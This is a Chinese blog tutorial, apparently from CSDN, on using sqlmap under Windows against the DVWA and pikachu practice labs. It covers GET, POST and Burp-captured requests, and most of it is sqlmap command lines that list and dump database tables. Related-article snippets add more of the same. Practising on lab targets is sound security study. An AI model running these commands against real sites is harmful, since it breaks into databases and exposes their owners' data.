window下使用sqlmap探测sql注入漏洞

最新推荐文章于 2022-10-14 15:57:57 发布
最新推荐文章于 2022-10-14 15:57:57 发布
阅读量578 收藏 2
点赞数
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MOONYOUS/article/details/115096593
版权

window下使用sqlmap探测sql注入漏洞

sql注入:攻击者用非法的参数向服务端执行数据,服务端没有对输入进行校验就直接执行了攻击者输入的非法操作,从而产生sql注入

在python文件夹中放入sqlmap文件夹 后进入cmd 找到文件夹后执行python sqlmap.py
这里对DVWA靶场进行操作

Cookie,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据

  1. 需要登录才能进行操作的网站查找sql注入漏洞。必须获取到cookie值

在这里插入图片描述
或者bp抓包 get类型
在这里插入图片描述

  python sqlmap.py  -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#"   --cookie="security=low; PHPSESSID=cu09mt6qi08gfq0tjf1f37ibb3"

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
有四种类型注入
dump 数据库中数据表中数据: --dump-all

  python  sqlmap.py    -u  "url" --cookie=""         --dbs

   python  sqlmap.py    -u  "url" --cookie=""         --dump                                      

python  sqlmap.py    -u  "url" --cookie=""      -talbes                   所有数据库以及里面的表        

python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -tables                     当前数据库以及里面的表      

python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -T  表名   -columns     爆出字段

python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -T  表名   -C 字段1,字段2  -dump   爆出字段对应的明文

2. 直接抓包 ,生成txt文本直接sql跑

在这里插入图片描述
在这里插入图片描述

  python  sqlmap.py   -r  1.txt   --dbs

3. post类型的包

在这里插入图片描述

python  sqlmap.py  -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs  --level 3 --risk 3 --batch

或者直接放到txt里

3. 批量抓包 跑sql

在这里插入图片描述
生成的burp.log和sqlmap.py 放在同一目录
然后就去抓包

抓包完 log 就记录了数据
然后开始跑

python  sqlmap.py  -l  burp.log --batch -smart     --level  3  --risk  3

总结,有登录界面先,就抓包拿cookie 然后get类型就cookie=“”,POST类型就data=“id”,或者直接全部丢到txt里跑,配合burp的抓包日志批量跑也可

MOONYOUS
关注
专栏目录
sqldd:一款碾压sqlmapsql注入漏洞检测系统^^
05-31
Sqli-lib是一款由PHP语言编写SQL注入漏洞闯关游戏,包含了六十几个可注入页面,涵盖了几乎所有类型SQL注入漏洞,同时不同的关卡自定义了不同的过滤规则,是SQL注入漏洞学习的首选靶场。图4-1 本地搭建Sqli-lib环境...
有手就行———使用sqlmap工具进行sql注入
maluxiao123的博客
03-31 1558
前面几节基础的sql注入原理就介绍完了,当然这是mysql注入的各种基础方法,还有很多高阶的注入技巧,做够了手工注入,理解各种注入的原理之后我们就来尝试一下sqlmap一把梭哈带来的快感。 前置条件: 1.安装python 2.下载安装sqlmap https://blog.csdn.net/zhongcui8067/article/details/80439934 cd到sqlmap安装目录查看version成功代表安装成功,由于我是python2和python3的共存环境,所以加了个-2的指令,大家直
sqlmap的用法,sqlmap -r
litiammmm的博客
07-15 6625
sqlmap结合burpsuit进行sql注入漏洞查找; 配置好burpsuit和浏览器之间的代理,网上方法很多,创建一个记事本,准备写入参数使用; 1、在sqlmap根目录下创建list.txt,你也可以在其他地方创建,待会协商目录就行; 2、打开需要测试sql注入的网站,并用burpsuit进行抓包,主要关注有参数传递的链接,如下图这种: 3、符合图Raw的所有信息写入刚创建的txt 4、执行sqlmap扫描命令 sqlmap -r list.txt --level..
sqlmap基础注入
elliaaa的博客
10-09 645
sqlmap基础注入 判断有无注入 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --batch 注入数据库 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --dbs --batch 注入表 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” -D KM --tables --batch 注入字段 python sqlmap
sqlmap工具使用
m0_62092622的博客
02-24 825
下载就不说了,尤其要提的是Kali不用下载哦 下面是一些常用命令: Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbos...
Sql注入window2003进行渗透攻击
帅醉了的博客
10-08 507
本次讲一下 Sql注入的基本思想和如何实现自动化注入 Sql注入可有两个思路:①判断注入点;判断字段数;查看回显点;操作系 统或获得shell。②判断注入点,查询数据库,查询数据表,查询列名,查询列名信息。 演示 1.环境:kali,window2003 2.工具:sqlmap、burp 3.实验过程: ①使用burp抓取网页的cookie ②使用sqlmap查看该网站是否...
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap sql 注入测试工具
最新发布
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sqlmap注入漏洞测试
02-22
在本文,我们将使用 SQLMap 工具来演示如何测试 SQL 注入漏洞。我们的目标是 stormgroup 数据库的 member 表,旨在获取用户名和密码信息。 Step 1: 寻找注入点 首先,我们需要寻找注入点,即用户输入数据与 ...
sqlmapwindows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sqlmap_windows版
11-07
sqlmap dos版,直接在windows平台上运行,有cmd 环境 就可以执行,不用安装python
sqlmap 注入教程 常用命令大全
weixin_44286136的博客
05-19 1307
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage –hh 帮助手册 详细 sqlmap.py -u “注入地址” --dbs // 列举数据库 sqlmap.py -u “注入地址” --current–db // 当前数据库 sqlmap.py -u “注入地址” --users // 列数据库用户 sqlmap.py -u “注入地址” --c
sqlmapwindows上执行sql注入,利用dvwa靶场
m0_46315342的博客
05-19 971
sqlmapwindows上执行sql注入,利用dvwa靶场 1.首先你要安装好sqlmap并且配置好坏境,不知道的百度搜索吧,还是比较简单的。 2.先安利一个博主手工注入的博客吧,建议学的时候先手工注入明白原理,体验一下痛楚,哈哈哈哈。 https://blog.csdn.net/qq_36119192/category_8345945.html 3.接下来我分享一下我的sqlmap注入过程 ··1网上很多都是在kali linux上执行的,但是别人建议新手小白先不要用这个,所以我就在windows上执
使用SQLmap检测漏洞
rang的博客
09-09 1743
使用sqlmap检测漏洞(经典用法) 1.sqlmap的安装 zip版:https://github.com/sqlmapproject/sqlmap/zipball/master tar.gz版:https://github.com/sqlmapproject/sqlmap/tarball/master 1、解压安装包 2、找到你安装python的目录(对于我来说:C:Python27) 3、现在,在python文件夹创建一个新的文件夹,并命名为“SqlMap” 4、然后把你刚才解压的SqlMap
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程将SQL语句插入到请求内容,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
sqlmap对dvwa进行sql注入
weixin_52971422的博客
04-01 4772
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
sqlmap自动化漏洞利用(DVWA初、、高)
qq_42620328的博客
10-14 7540
sqlmap自动化漏洞利用(DVWA)
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3429
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值